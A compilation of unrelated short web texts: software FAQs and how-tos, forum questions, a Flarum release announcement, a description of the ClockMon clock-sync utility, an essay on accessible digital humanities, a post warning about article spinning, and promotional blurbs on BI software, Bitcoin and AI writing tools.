10. Where do I learn more about JVM?
There is more to the JVM than just being the runtime engine. You might be interested in knowing the garbage collection modes, policies, or the command line parameters for the JVM, or a diagnostic guide. The best resource to learn more about JVM is developerWorks Java technology: Diagnosis documentation here.
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I've never played a game where I thought "romance" was absolutely needed or fundamental to the core experience of the game.
The whole "What do you define as romance?" argument shall arise, I presume.
Well, I don't really qualify Mario and Peach as a romance prsonally because I mean, you knew that's who Mario wanted to be with but there was no dialogue, emotion, etc. and that's probably due to the limitations years ago. Mario and Peach was more of a companionship, like that of Sonic and Tails, etc.
I define video game romances as something more like what we see in Witcher series or Mass Effect... Sadly. They've always been horribly done, without any real depth or meaning. Sure. They might change the ending or open a quest but there are alot of games which have multiple endings that don't have any romance.
And I'm not sure if I've ever seen romances actually done right in a video game before, so I'm curious to how Josh will handle that for Deadfire - if romances will be in Deadfire.
Edited by SonicMage117, 28 April 2017 - 05:39 PM.
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Options for posting via the API to a Facebook Group
Facebook Groups requires the Facebook Ayrshare App to be enabled for the Group. Please see here for instructions:
JSON for a basic post with a link and image to a Facebook Group:
"post": "The best group ever #best https://www.facebook.com",
Facebook will automatically preview the link in the post unless there is an image or video included. In the above example the image will show. Removing the image will cause the link preview to show.
Faceboook Groups supports the same set of rich capabilities as Facebook Pages. Please see the Facebook Page options for details of the functionality.
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You can improve the readability of your python code by adding syntax formatters and checkers.
It is not hard and not time-consuming. Checkers and formatters will not transform bad code into good, but the readability will go up. Think about fixing syntax as about basic hygiene. It is like brushing your teeth, but for the code.
I wrote a blog post on the topic called Nine Simple Steps for Better Looking python code. Feel free to check it out.
Step 1: configuration files
Add these files to the root of your repository.
Step 2: requirements
Install the required libraries with
pip install black flake8 mypy
Step 3: black
There are 100500 ways to format the code. Formatters like black or yapf modify the code to satisfy a pre-defined set of rules.
It is easier to read codebase that has some standards. When you work on the code for hours and need to switch a context between different coding styles, it drains “willpower energy” — no need to do it without a good reason.
will reformat all python files to follow the set of rules by black.
Step 4: flake8
will not modify the code, but will check code for syntax issues and output them to the screen.
Step 5: mypy
Python does not have mandatory static typization, but it is recommended to add types to the function arguments and return types.
....def forward(x: torch.Tensor) -> torch.Tensor:
You should add typing to the code.
- It makes it easier to read the code.
- You can use the mypy package to check arguments and function types for consistency.
After updating the code run mypy on the whole repo:
If mypy found issues — fix them.
Step 6: pre-commit hook
Running flake8, black, mypy manually all the time is annoying.
There is a tool called pre-commit hook that addresses the issue.
To enable it — copy this file to your repo: .pre-commit-config.yaml.
You need to install the pre-commit package on your machine with:
pip install pre-commit
And initialize with:
You are good to go.
From now on, on every commit, it will run a set of checks and not allow the commit to pass if something is wrong.
The main difference between the manual running of the black, flake8, mypy is that it does not beg you to fix issues, but forces you to do this. Hence, there is no waste of “willpower energy.”
Step 7: Github Actions
You added checks to the pre-commit hook, and you run them locally. But you need a second line of defense. You need Github to run these checks on every pull request.
Way to do it is to add file .github/workflows/ci.yaml to the repo.
There are lines:
- name: Install dependencies
python -m pip install --upgrade pip
pip install -r requirements.txt
pip install black flake8 mypy
- name: Run black
black --check .
- name: Run flake8
- name: Run Mypy
run: mypy retinaface
that tell GitHub what to check.
I also recommend to give up the practice of pushing the code directly to the master branch.
Create a new branch, modify the code, commit, push to Github, create a pull request, and merge to master.
It is a standard in the industry, but it is exceptionally uncommon in the academy and among Kagglers.
If you are not familiar with these tools, it may take more than 20 minutes to add them and fix errors and warnings.
Remember this time. In the next project, add these checks in the first commit, when no code is written. From that moment, every small commit will be checked, and you will need to fix at most a couple lines of code every time: tiny overhead, excellent habit.
I would also recommend reading a book Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones. It talks about small changes in your behavior that improve productivity and the quality of your life.
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(2) A bonding bar near the service equipment enclosure,
meter enclosure, or raceway for service conductors.
The bonding bar shall be connected with a minimum
6 AWG copper conductor to an equipment grounding
conductor(s) in the service equipment enclosure, meter
enclosure, or exposed nonflexible metallic raceway.
The wording is a little strange. "connect a conductor to a conductor in the enclosure".
Question: Can the bonding bar simply be connected to the ground bar with a length of #6 or larger?
Honey, does this tool belt make me look FAT?
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I just posted four years ago, so I'll try to keep this brief.
I'm now using Fedora 17 although two versions behind the current 19. No matter, Linux is now stable and feature-full outside of the GNOME GUI which we abandoned a year or two ago in favor of XFCE.
Although I rarely update Cream, I still regularly build gVim installers for Windows. I hope to get Cream 0.44 out the door shortly with some bug fixes and features I've added for myself that others may be interested in. Wow, 43 releases to date.
The big news is that I've founded SteveHallArchitecture and have devoted my professional endeavors to architecture that is both beautiful and efficient. In a way, this is the very same philosophy as my approach to Cream: simple, yet elegant.
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Prakhar Mishra is a Full-time MS by Research student at WSL, IIIT-Bangalore. He holds a bachelors degree in CSE from The LNM Institute of Information Technology, Jaipur. He has a total industry work experience of 3 years in the field of Data Science, particularly in NLP and Text Analytics. His areas of interest includes Unsupervised Learning, Natural Language Understanding and Generation. He also owns a blog which you can find here.
For more, please visit his LinkedIn profile.
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v1.1.0 - Platypus
- ‼️ New spoiler and strike-through buttons for Markdown
- 🦶 Post footers are now hidden when empty, reducing whitespace
- 🗜️ Code blocks now have a maximum height
- 🤖 Accessibility improvements for search, checkboxes, and icons
- 🎨 New theme extenders to override entire Less files
- ⏱️ New frontend asset preloading extender, used by default to preload FontAwesome, JS and CSS
- 🙈 New no-JS admin dashboard, for when that pesky extension breaks everything
- 🙆 Replaced usernames with display names in more places
- 💻️ Various frontend typing improvements for developers
php flarum info now shows your forum MySQL version
- 🐛 Loads more bug fixes
- 🆕 ...and much more!
📣 The release
Woah, how time flies! It feels like just last week that we hit Flarum's 1.0 stable milestone. But now another release cycle has passed, and we're happy to welcome to the stage (trumpet noises)... Flarum 1.1! 🎺 🎉
A fair bit has changed with Flarum in 1.1. We've been mainly focusing on bugfixes, extensibility and developer improvements, along with a sprinkling of accessibility.
Most extensions should face no breaking changes, but those with deep integration into the frontend may have some slight hiccups before they're updated for 1.1.
For a full list of changes, check out our changelog and upgrade guide.
👨💻 For Developers
Most extensions should be ready-to-go on Flarum 1.1 out of the box. If you're overriding component views, or directly manipulating the DOM, you might need to implement some minor changes in some areas.
For theming, we have switched to CSS custom properties wherever possible. You can finally remove your horrible
!important properties from your colour modifications, and switch to the applicable custom property overrides. Check out the pull request for more info.
Before you upgrade, make sure to create a backup of your
public/assets directory, your
composer.json and your database!
Before starting the upgrade process, ensure you are on Flarum 1.0.0 or above in your Admin Dashboard or by typing
php flarum info. If you're not, use the previous release notes for upgrading from an earlier version.
To upgrade from 1.0 to 1.1, take a look at our upgrade guide documentation. The process should be much easier compared to previous major version upgrades, due to the lack of breaking changes.
If you run into any issues, please open a new discussion under the Support tag. Ignore similar discussions, and open a new one anyhow. Make sure to mention the output of
php flarum info,
composer why-not flarum/core v1.1.0 and any errors in their fullest.
Flarum wouldn't be the same without our over one hundred contributors, along with their generous time commitments! For this release we specifically thank these wonderful people:
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You can support us:
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If you're looking to get coding, make sure to check out our documentation.
🔮 What now?
We're currently planning our kick-off meeting for build 19 (v1.2), as well as discussing future roadmaps and strategy ready for v2. Hopefully, we'll have a roadmap for v2.0 up soon!
There might be a couple of minor patches between v1.1 and v1.2 where we address minor bugs, so keep an eye out for those.
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Go to the Logic Pro or Logic Express menu and choose Preferences > Audio. In the Core Audio pane of the Device tab, select Duet 2 for Output Device and Input Device. Set the I/O Buffer Size to 128. Click Apply Changes at the bottom of the Preferences window. By selecting Duet 2 input and output labels in Logic, the labels you see in Logic’s Channel Strip input and output slots correspond exactly to Duet 2’s hardware inputs and outputs, making I/O assignment much easier. 1. In Logic, choose Options > Audio > I/O Labels. 2. Select the labels in the Provided by Driver column. 3. Close the IO Labels window. Now close the Logic Pro Preferences window and select New > Collection > Empty Project from the Trackmenu. If you are recording a single microphone or instrument, make the following selections in the New Tracks dialog box:
Number: 1 Type: Audio Format: Mono Input: Input 1 Output: 1-2 Check the Input Monitoring checkbox Check the Record Enable checkboxLogic will now ask you to name the project and save in on your hard drive. Click the Record button in the transport control at the bottom of the Logic window. You’re now recording with Duet 2!
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In the chapter, Disability, Universal Design, and the Digital Humanities, George Williams argues that while scholars have developed standards on how to best create, organize, present and preserve digital information, the needs of people with disabilities are largely neglected during development. It is assumed that everyone has the same abilities to access these ‘digital knowledge tools’ but it is more often the case that these tools actually further disable people with disabilities by preventing them from using digital resources altogether. In order to rectify this oversight, Williams believes that digital humanists should adopt a universal design approach when creating their digital projects, offers reasons why they should, and gives project ideas.
Universal design is defined as “the concept of designing all products and the built environment to be aesthetic and usable to the greatest extent possible by everyone, regardless of their age, ability, or status in life” (“Ronald L. Mace”). For designers, it is making a conscious decision about accessibility for all, not just focusing on people with disabilities. Four reasons why digital humanists should adopt universal design principles are:
- In many countries, it is against the law for federally funded digital resources to not be accessible. And while U.S. federal agencies do not yet require proof of accessibility, this may not be the case in the future. Section 508 of the U.S. Federal Rehabilitation Act requires that all federal agencies “developing, procuring, maintaining, or using electronic and information technology” ensure that disabled people “have access to and use of information and data that is comparable to the access to and use of the information and data” by people who are not disabled. Projects seeking government funding could be turned down in the future if they cannot show proof of complying with Section 508.
- Universal design is efficient. In order to comply with Section 508, web developers would create an alternate accessible version. Creating two versions is expensive and time-consuming, so it would make sense to just create one version.
- Applying universal design principles to digital resources will make those resources more likely to be compatible with multiple devices including smartphones and tablets, which disabled people often use. Studies also show that an increasing number of people who access the web use mobile devices, among those minorities and people from low-income households.
- Most importantly, is that it is the right thing to do. As digital humanists, we recognize the importance of open access to materials, and we should extend the concept of open access to include access to disabled people. We do not often think about people with disabilities while developing digital resources, and that can lead to barring this group from the information entirely. If the goal for our resources is to share with as wide and diverse an audience as possible, we should already be using universal design principles.
Williams then shares project ideas, including accessibility tools for the more popular content management systems (WordPress and Omeka), format translation tools that convert RSS feeds into XML formats for digital talking book devices, and tools for crowdsourced captions and subtitles. He concludes with the reciprocal benefits of adopting universal design principles and the significance of digital resources being not only useful but usable to all.
While reading this article, I couldn’t help but think about the ALA’s Library Services for People with Disabilities Policy (found here ) Without going into too much detail, the policy was approved in 2001 and recognizes that people with disabilities are often a neglected minority and that libraries play a crucial role in promoting their engagement with their community. And that libraries should use “strategies based upon the principles of universal design to ensure that library policy, resources, and services meet the needs of all people.” The policy then goes on to make recommendations on how libraries should improve services, facilities, and opportunities for people with disabilities. The policy is a big point in library school, it’s often hammered into students’ brains, and is a central point when creating access to the library and its collections (for legal and ethical reasons). I am not sure why it took until the chapter and seeing the similarities to the ALA Policy to consider people with disabilities in regards to digital resources-possibly because I haven’t created a ‘complete’ digital project yet-but I can say that it is something I will definitely consider going forward. Maybe because it’s my first semester in the program, or because I still see myself as a librarian first and digital humanist second, instead of just being both. Either way, this was a good reminder to truly think about accessibility for all.
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Java: basic irc bot help?
Hey everyone! I wrote a basic irc bot that I need a little help with, everything compiles and runs fine but I can't seem to find out how to where I can make the bot say things by typing into my console.
For example if I typed "Hello" in console I would want it to say "hello" in the channel
Any help is very much appreciated, here is my code:
Note at the end of the code below /*write input to channel*/ was my first attempt to do this and does not seem to work
- Anonymous7 years agoFavorite Answer
Here's the bot: http://www.jibble.org/pircbot.php
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I have created a custom component with 2 views.
1st view is added to the standardActivity component BT126H_CALL as assigment block.
1st view is a table view with 6 columns ... out of the 6 1 column is a 'Demand letter no' which is also a hyperlink.
2nd view is a form view.
Now in the activity page, when clicked on the 1st views 'Demand letter no' row I want the 2nd view to popup.
I know how to call 2nd view from 1st view in the custom component itself. .according to this link http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/16463.....I [original link is broken] [original link is broken] [original link is broken] followed the same but it through error saying ' CX_BSP_WD_INCORRECT_IMPLEMENT... define navigation click. where do i have to create the navigation link on the custom component or the standrad activity BT126H_CALL.
Also I went through this link: http://wiki.sdn.sap.com/wiki/display/CRM/CallingCustomcomponentaspopupfromastandardcomponentinCRMWEBUI-Part+2....... but still not happeing....I think i have to do some more changes....Please guide me on this.
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I have a problem and I don't know how to work around it: I used the WMPLib in my C# application (located in C:\Windows\System32\WMP.dll). I referenced it and dded it in the header of the main form's code file:
But if I try to run my app on a Windows N edition (I think also the KN edition counts here), it stops working and Windows shows the following message: "App-name has stopped working. You can check for a solution...". So now, I'm trying to find a way to work around this, for example, by not importing that DLL at run time when user is running a Windows N edition. I'm afraid that I wouldn't have a way to redistribute my app to Windows N users.
Thanks for any advice, Vali
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Tongyun Li posted on Wednesday, October 02, 2013 - 1:11 pm
I'm trying to run a multiple group analysis with Mplus, and the groups correspond to data collected at different time points. My problem is that the data set for time 1(group1) has 30 replicate weights and the data set for time 2(group2) has 80 replicate weights, with all other variables the same. Is it possible to run multiple group analysis in Mplus without combining data sets into one single data set? Since I cannot only use 30 out of 80 replicate weights for group2, is there another way to circumvent this problem?
I think the best approach would be to use 2400 replicate weights where each replicate weight is obtained as weight for group 1 (30 possibilities) and a weight for group 2 (80 possibilities) for a total of 2400 possible replicate weights.
Stephan Daus posted on Saturday, September 09, 2017 - 4:25 am
I have a similar problem. I have a dataset with many countries, each country using a varying number of replicate weights (mostly 75, some as few as 59). Thus some countries have missing values on the last replicate weights. How does Mplus deal with missingness on these rep.weights? Will it impact the SEs?
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(click on the above link to download; 40K)
(or build it yourself from the source; 128K)
I happened to notice that for some time now my Windows system couldn't keep time worth crap.
It was constantly losing time, anywhere from several seconds per hour or so to many minutes per day (sometimes as much as 15 minutes or more in a single day!)
I couldn't figure out why it was happening and just figured either my RTC circuitry was bad or the battery was low or something.
I even went so far as to install a little freeware clock synchronization program that syncs up your computer clock to one of the many atomic clock time servers out there on the Internet, and wrote a little batch program to log the results.
For several months I simply made note of the fact that my clock was very frequently very out-of-sync with the rest of the world and made adjustments to how often I would have to resync to one of the atomic clocks in order to maintain a reasonably accurate time-of-day clock, until eventually I had to resync every few hours.
Eventually, though, I began to notice a definite pattern.
I noticed that whenever I would get heavily involved in program development, doing frequent compiles and links of whatever program I happen to be developing, the clock would get out of sync more quickly than otherwise. I found this to be especially true (especially noticeable) when I did cross-platform development under Cygwin, using the GNU make and gcc compiler and other tools. I also noticed that during such Cygwin builds, my mouse would be slightly jerky and somewhat on the sluggish side.
This eventually caused me to suspect that the reason my clock was becoming more and more out of sync was because clock interrupts were being lost, gradually causing the Windows clock to get further and further behind (i.e. to lose time).
A few hours of investigation doing various searches on the web and a few searches of Microsoft's own support database confirmed my suspicion.
However, as what may come to no surprise to some, the various suggested work-arounds failed to resolve the problem. My clock was still getting out of sync rather quickly whenever I did some heavy duty program development.
Eventually I decided enough was enough and sat down and wrote ClockMon™, a handy little program that periodically reads the hardware (BIOS or CMOS) Real Time Clock (RTC) and compares it with the Windows operating system clock, resetting the Windows clock whenever it notices the two are out of sync.
ClockMon™ reads the Real Time Clock by doing direct I/O to port 70, which is not normally allowed under the Windows NT/2K/XP security model.
But ClockMon™ is nonetheless able to run on Windows NT, Windows 2000 and Windows XP systems too thanks to a free device driver called giveio.
The tiny little giveio device driver simply gives any program (that properly asks for it) the necessary privileges to do direct port I/O.
Just do a web search for "giveio" and you should find several places where you can download it from. It also comes with its own complete set of source code just like ClockMon™ so you can build it for yourself if you want to.
ClockMon™ comes with a pre-built version of the giveio device driver (as well as the source code too in case you want to build it for yourself) which is automatically installed the first time you run ClockMon™ (if you don't already have it installed on your system of course).
You see, the Windows operating system clock starts out with the same value as the Real Time Clock whenever you reboot your computer, but from then on, it is updated completely independently of the RTC via periodic clock interrupts. Thus, over time (i.e. as the system runs), it is possible for the Windows operating system clock to get out of sync with the actual hardware RTC clock (i.e. the actual "wall clock" time).
This happens because as the system runs, certain software and operating system functions sometimes have to disable all interrupts causing the operating system to sometimes miss a clock interrupt. Most software that disable all interrupts (including the Windows operating system) don't keep interrupts disabled for very long (it's usually only for a VERY short period of time -- usually only a few microseconds (millionths of a second) at most), but because they DO disable all interrupts from time to time, clock ticks ARE unfortunately periodically lost, and over time, add up, causing the Windows operating system clock to sometimes differ considerably from the actual "wall clock" time (sometimes by several minutes or more, depending on system load and the variety and type of software programs running during the time period in question).
When ClockMon™ notices the Windows operating system clock differs from the actual hardware Real Time Clock by more than a predefined amount (but less than 30 minutes), it resets the minutes and seconds portion of the Windows system clock to that of the RTC, thereby eliminating this annoying "Windows Clock Drift" problem and ensuring a more accurate Windows clock value (since the BIOS/CMOS hardware RTC circuitry operates independently from the underlying operating system and should under normal circumstances always be relatively accurate since it doesn't have to worry about missing an interrupt).
Clicking the close box or the minimize box simply hides the main window so that it doesn't clutter your screen or taskbar. To actually exit the program, you must select the "Exit" function from the "File" menu.
Once hidden, you can easily cause the main window to be redisplayed again by simply double-clicking on its icon in the System Tray area. Right-clicking on the tray icon displays a context menu virtually identical to the menus that are available from the main window.
Also, if specified, an optional log file named "ClockMon.log" is created and written to as the program runs which logs the current operating system time, the RTC time, and the difference between the two. You have the option of either logging every time sample the program makes, or only the samples that cause the system clock to actually be reset.
The log file entries look like this:
An "**" following the calculated difference between the two times indicates the system clock was reset for that log entry. If the "**" is not present, then the system clock was not reset for that sample. An "!!" indicates that ClockMon™ discovered an unusual occurrence: that the system clock was found to be ahead of the RTC time rather than behind it as normally expected (i.e. that the Windows system clock appears to be running faster than the Real Time Clock rather than slower as is normally expected). As far as I know, this is only an issue on Windows NT/2K/XP systems and not on Win9x/Me systems.11/06/02 18:54:36 RTC=54:37.000 SYS=54:36.994 DIF=00:00.006 11/06/02 18:54:39 RTC=54:40.000 SYS=54:39.989 DIF=00:00.011 ** 11/06/02 18:54:41 RTC=54:41.000 SYS=54:41.001 !! DIF=00:00.001
All ClockMon™ configuration settings can be entered via the Options dialog or specified via command-line arguments. Whatever values you specify (either via the Options dialog or via command-line arguments) are saved and used the next time ClockMon™ runs:
ClockMon™ Command Line Arguments ----------------------------------- /hide show the main window initially hidden /nohide show the main window initially visible /log record the clock drift to the log file /nolog do NOT record the clock drift to the log file /logall record ALL time samplings to the log file (ignored if /log not specified) /nologall only record samples causing the system clock to be reset (ignored if /log not specified) /sync reset the Windows system clock when it's out-of-sync /nosync do NOT reset the Windows system clock; just monitor it /back do backward syncs too (ignored if /sync not specified) /noback only do forward syncs (ignored if /sync not specified) /nn monitor and/or set clock every this many minutes (where 'nn' is a number from 1 - 1440) /nnnn reset system time whenever it differs from the RTC time by more than this many milliseconds (where 'nn' is a number from 10 - 9999) Note: to specify this value, you must specify the /nn sampling interval first. The first number is always interpretted as the sampling interval and only the second subsequent number is interpretted as the desired accuracy in milliseconds. /sec0 force synchronization on RTC seconds update boundary (see discussion further below for details) /nosec0 do NOT force seconds update boundary synchronization /clear clear the log file to empty before starting /noclear do NOT clear the log file to empty before starting filename use "filename" as the name of the log file (if the name contains blanks, surround it with double quotes)
The "sec0" option forces ClockMon™ to retrieve the RTC time as close as possible to when the Real Time Clock circuitry actually updates its 'seconds' register. Doing so ensures the RTC time value it uses to synchronize the Windows system clock with is as accurate as possible (i.e. is as close to the actual RTC time as possible). Not specifying this option causes ClockMon™ to use whatever time value was returned by the Real Time Clock at the moment it read it, thereby allowing it to be off by up to one second. (The Real Time Clock only returns hours, minutes and seconds (as well as the date of course, but ClockMon™ doesn't use it), but not milliseconds. Thus, if the "actual" time was, for example, 14:41:53.997 whenever ClockMon™ goes to read the RTC, the value that is returned to it (and the value that is uses to synchronize with) is only "14:41:53" (the Real Time Clock circuitry does not "round" the seconds value that it returns to you; it can only report what second it actually is "right now"). If ClockMon™ were to then reset the Windows system clock to that value, the Windows system clock would then be off by 997 milliseconds. Specifying "sec0" however, causes ClockMon™ to wait until the Real Time Clock reports that it is updating its seconds before reading the RTC time value, thus ensuring the RTC time it uses to synchronize the Windows system clock with is as close as possible to the actual "true" time.
With the 'sec0' option specified, ClockMon™ is able to achieve, on average, better than 10 millisecond accuracy!
NOTE: After starting ClockMon™ for the first time, you must manually configure it before it will begin resyncing your Windows clock.
The default settings are to simply monitor the clock but not to reset (resync) it. If you want ClockMon™ to sync your Windows clock, you must specifically tell it to do that. (The reason the default is specifically to not resync your clock is to prevent unintended system modifications. Not everyone may want to use ClockMon™ to resync their clock. Some people may simply want to monitor the inaccuracy of their Windows clock and not resync it, so if you want ClockMon™ to actually resync your Windows clock, you need to specifically enable that option).
Since writing this handy little program and adding it to my Startup folder, my Windows clock is rarely ever out of sync by more than a few milliseconds or so, and I discovered that I don't even need to resync to any of the Internet atomic clock time servers anymore since, apparently, my Real Time Clock (RTC) is quite accurate! (Or at least accurate enough for me; individual results may vary of course.)
So, if you're currently frustrated with having your Windows clock being constantly out of sync, give ClockMon™ a try, and enjoy having an accurate and reliable clock again. :)
"Fish" (David B. Trout)
"Programming today is a race between
software engineers striving to build bigger
and better idiot-proof programs, and the
Universe trying to produce bigger and better
idiots. So far, the Universe is winning."
- Rich Cook
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When you create a platform that rewards content, people are bound to try to take advantage of the system. Thankfully, here on Scorum, the team behind the platform cares about unique and quality content and they are willing to fight to maintain that level of quality and originality. This desire has made way for the plagiarism checker that scans articles after they are published and adjusts their ability to receive rewards. However, there are users who are finding ways around this tool, and one of those ways is through the act of article spinning. Have you heard of it?
What is Article Spinning?
Spinning an article refers to altering an existing piece of content to avoid plagiarizing it and to quickly turn someone else's work into something you're now calling your own. The article is "spun" by being automatically or manually altered, usually by replacing common words with synonyms.
This act is common in the content marketing world, and is seen as a bad practice. Some creators use the term for when they reuse parts of an older article to make a new piece of content, but the most common form of article spinning includes someone using someone else's work to create a new piece of content (that is not unique or entirely original).
Why are People Spinning Articles Here on Scorum?
Spinning an article doesn't take skill or creativity. It's simple and can turn a good article into a similar decent article in seconds. The "new" piece will not appear as plagiarism because many of the words have been replaced with similar words and the structure has been changed.
This creates an opportunity for scammers.
"So you mean I can do basically no work and trick people into thinking I just wrote this 500-word article? Where do I sign up?"
Not so fast, jerk. We'll deal with you later.
How Do They Do It?
A quick Google search will reveal several article spinning tools. Keep in mind that I am not writing this so you can learn how to spin articles. On the contrary, I'm writing this so you can be on the lookout for those that are using the work of others to trick you and make a quick buck.
We commonly see article spinning with hard news articles. For example, a short summary of an NBA or NFL game would make for easy pickings. A "spinner" could find an article on NFL.com or ESPN.com, put it in an article spinner, click a button, and have an article that they didn't write that won't appear to be plagiarism through Scorum's plagiarism checker.
Take this ESPN.com article on the current feud happening in the Golden State Warriors locker room. When plugged into an article spinner, here is what we have:
As you can see, the spun text read awkwardly and is clearly not an original article that someone would write for sports fans. "Golden State Warriors whiz (not a commonly used word) Durant made it unmistakable...that he never again needs to address the episode he had not long ago with Draymond Green." The sentence still works in English, but it's doesn't flow well and uses uncommon phrases. This continues in the spun article with workds like "impending," "squabble," and misfortune again. While you can't just assume someone is article spinning due to using rare words, they may be a sign that someone is replacing words with synonyms because they are spinning an article.
What Can We Do About It?
The first step to stopping it is knowing about it. Thank you for reading this article. These pieces can be very hard to detect, but as mentioned, they are usually hard news stories and recaps. They also lack a personal view of the game. This is a warning sign.
For example, if someone regularly posts recaps of games without giving an opinion of their own, it's possible that they did not watch the game or match, they simply spun the article. I would not recommend accusing them of spinning an article, but you may want to avoid their work in the future or request that they add their own opinion.
Example: "Hey @XYZ! Nice overview of what happened. What did you personally think of the match? I'd love to see your own thoughts added to these summaries."
One of the reasons I am more likely to give upvotes to users who add their own thoughts to summaries (like @chops316, @bamamama, @talesfrmthecrypt, @jodcarey) is because it's clear that these articles and thoughts are coming from them. And isn't that what we really want to see here -- original thoughts and analysis?
Thank you for reading! If you have any thoughts or questions, please feel free to add below. Had you heard of article spinning before?
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Hello! I'm Josh Conley. I design and develop websites.
At the moment I'm working on a real-time collaborative writing environment called Typewrite.
If you'd like to contact me you can send an email to email@example.com. I'll get back to you as soon as I can.
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Visual Studio for MDX
CubePlayer is a tool that will change your data into information and information into knowledge and will do so within any department in the organization. CubePlayer is a business intelligence application which can connect to multiple databases and file formats. No technical expertise is required, CubePlayer is user friendly with easy to use interface. It is an ultimate tool for strategic and tactical decision making at every stage of business process.
Monitor your efficiency, optimize performance, analyze your past and predict your future. Have your information ready and prepared in every moment at any place. Relay on your data, make your decision accurate.
From the technical perspective, CubePlayer is a .NET 2.0 OLAP client that works with Microsoft Analysis services 2000, Microsoft Analysis services 2005, Microsoft Analysis services 2008, Microsoft Analysis services 2008 R2 and Microsoft Analysis services 2012 databases and local files.
It runs on 32-bit and 64-bit Windows platforms. In small environments it can be installed on desktops. In large environment - on desktops or an application server and then used through remote connections since it supports multi-instance. CubePlayer supports multi-threading and stores all of its objects as XML files. It has document based user interface with docking windows (as in Visual Studio) and user configurable environment are additional pluses.
Designed for all categories of end users, it is primarily recognized as an invaluable asset by power users and analysts, since it allows them to save much of the their time needed to create the same analysis using other tools or no tool at all.
CubePlayer supports multiple connections to various SSAS databases and local cubes, one-click reports with or without linked parameters, various display modes, drag&drop interface, export to various formats (Excel and SSRS included), dashboards with innovative features like set operations (AND/OR/XOR) on its panels, built-in analyses, exception highlighting, advanced query designer (pivot), advanced MDX editor with Intellisense and MDX behind (view MDX for any object as it changes - live), drillthrough, actions and KPIs, user defined members/sets (built-in and various modes of creating new ones) and much, much more in its intuitive and flexible working environment.
Its true power is its MDX generation/handling engine that allows end users to create various pivots (ad-hoc reports) in its designer without having to learn MDX. So the limited select-all-or-some members from hierarchy, found typically in less powerful clients or add-ins is here extended to a larger set of common OLAP functionality that is otherwise required to be written by professionals in MDX language. Furthermore, users can even paste any MDX inside its Editor, run it and analyze the data without any limitations. CubePlayer makes no distinction whether query originated from its Designer, or it was an MDX aquired from another application (source).
And there's a real example of usefullness of such feature, even for beginners, who don't know anything about MDX. CubePlayer can aquire and run MDX from your SSRS reports (including parameters) inside its own environment (grid). That means user is no longer limited with context of predefined report. No, he can add any other dimension/hierarchy/attribute/measure to it, remove some of the existing and redefine it in a completely new report (without ever seeing its MDX!) since CubePlayer allow all that and more for any query. As said before, there's an option to export a query/grid to SSRS, which makes a nice loop back. Just imagine empowering (selected) users with such an analytical environment.
All tables, graphs and dashboards are live and support right-click funtions for drilling (down, up, through in many variants), isolation or removal of members, ordering members/hierachies on axis, generating sets from results, predefined measure templates, unions, differences, etc. Much of its functions allow tuple generation for slicing purposes (TopCount's third argument i.e.), a feature much needed in analysis of data. Search for members by name or property will be much useful when dealing with time dimension or large dimensions in general. Graphs and tables can have predefined or user defined styles (bar, line, stacked, font sizes, colors, etc.) that are also included while performing export into Microsoft Excel. Furthermore, each query or designer object can have rich text comment that helps in multiuser environment. In that environment, file based repository can be organized through CubePlayer, where end users share their member/set definitions, styles and reports. Many of its features are obtained on click or through the wizards.
Cubeplayer comes with rich local and online help and video tutorials that provide fast kick-start in multidimensional world.
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Date: 2020-05-11 14:49:33
BULLISH Bitcoin Halving Indicators!! | The Largest Futures Gap in HISTORY!
Finally the Bitcoin Halving is occuring. So we can talk about something else. lol. In today’s video there is some very professional Bitcoin technical analysis bitcoin price predictions Bitcoin news and I discuss the largest Bitcoin CME futures gap in history.
Disclaimer: I am not a financial adviser and this is not financial advice. Bitcoin trading and investing is risky.
#crypto #cryptocurrency #bitcoin
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Chatgpt in Education, Tech, and More
Chatgpt, an artificial intelligence, has recently released text that sounds like human. This has caused concern over its potential application in the education sector, technology industry, and more.
The site also produces fake news essay and newspaper articles that are hard to differentiate from authentic work. This New York City school district has recently removed it from their system, leaving educators scrambling for ways to prevent cheating.
1. Jasper ai
Jasper AI is an online writing tool created to aid writers in creating more engaging content, stimulating ideas, and getting over writer’s block. In addition, it assists them achieve higher rankings in Google results for search results.
It comes with 50 short-form copywriting templates to create content for blogs social media channels, websites as well as email campaigns. Additionally, it comes with a Boss Mode plan which gives you access to the long-form editor – more versatile with more tools that integrate with its short-form counterparts to increase your creativity.
Jasper AI not only offers templates for copywriting, but it also comes with other useful features and functions that are useful for travel bloggers and creators of content. It also has the History tab where you can save any content generated by Jasper AI. This will make it easy to find and reuse the content you have curated when ready to publish it online.
This tool also offers an outline of text, which is handy when you need to quickly summarize a text. It also generates blog post topic ideas and article outline that keep your readers entertained.
Another fantastic feature is the Jasper Paragraph Generator, which can automatically generate amazing paragraphs to use in articles, blog posts or any type of writing. These paragraphs are well-thought out, helpful and unique.
Jasper AI’s chat support team is excellent, offering live webinars to demonstrate their software and provide general guidelines on best practices. They’re reachable via email, chat and phone calls as in addition to providing hands-on documents and instructional videos. In the end, Jasper AI boasts an impressive number of attributes that make their service extraordinary:
If you’re searching for an easy solution for creating content, Jasper AI is worth considering. It provides an affordable option and comes with a variety of features that will assist you in creating more content that is highly-converting in less time.
Chatbots are a valuable asset for customer support, whether your customers use them to navigate your website or to get answers to their queries. They are not only efficient in providing support 24/7 across time zones and international locations, but adding employees can simplify operations as well.
AI-powered chatbots utilize natural language processing and machine learning to answer basic customer inquiries. As these bots learn by listening to thousands of conversation, they become better at providing more pertinent responses over time, by studying data.
Integrating a chatbot into your customer service operations will boost effectiveness by taking routine inquiries off your staff’s to-do list and allowing them to concentrate on more difficult queries. Additionally, it lowers costs by enabling agents to manage fewer requests at once and allowing them to focus more time working on actual issues.
Another key advantage of using a chatbot is the possibility of analyzing its performance. You can ask customers at the end of every contact to see how well the bot resolved their issue which gives you the opportunity to improve its performance or teach it new capabilities.
Chatbots have the unique capability of collecting user data and allowing them to deliver a customized and tailored experience to each user. This helps companies boost their Net Promoter Score (NPS) improve retention rates, and grow their operations.
Chatbots can easily be integrated into existing customer support software. This gives a complete overview of all interactions with customers across channels, which includes the web, allowing you to follow-up on clients and to send surveys of feedback when needed.
ChatGPT is a natural language processing program developed by OpenAI that allows users to post questions and comments for instant responses. It responds in the form of audio, text and video , and is able to help with general information and research subjects. Additionally, ChatGPT can be used for troubleshooting devices, solving math-related problems, or finding out information on companies or products.
However, this tool isn’t perfect since it only utilizes data before 2021. It could leave certain topics like world events, for instance, without enough information points, resulting in inaccurate fill in of those gaps with incorrect info.
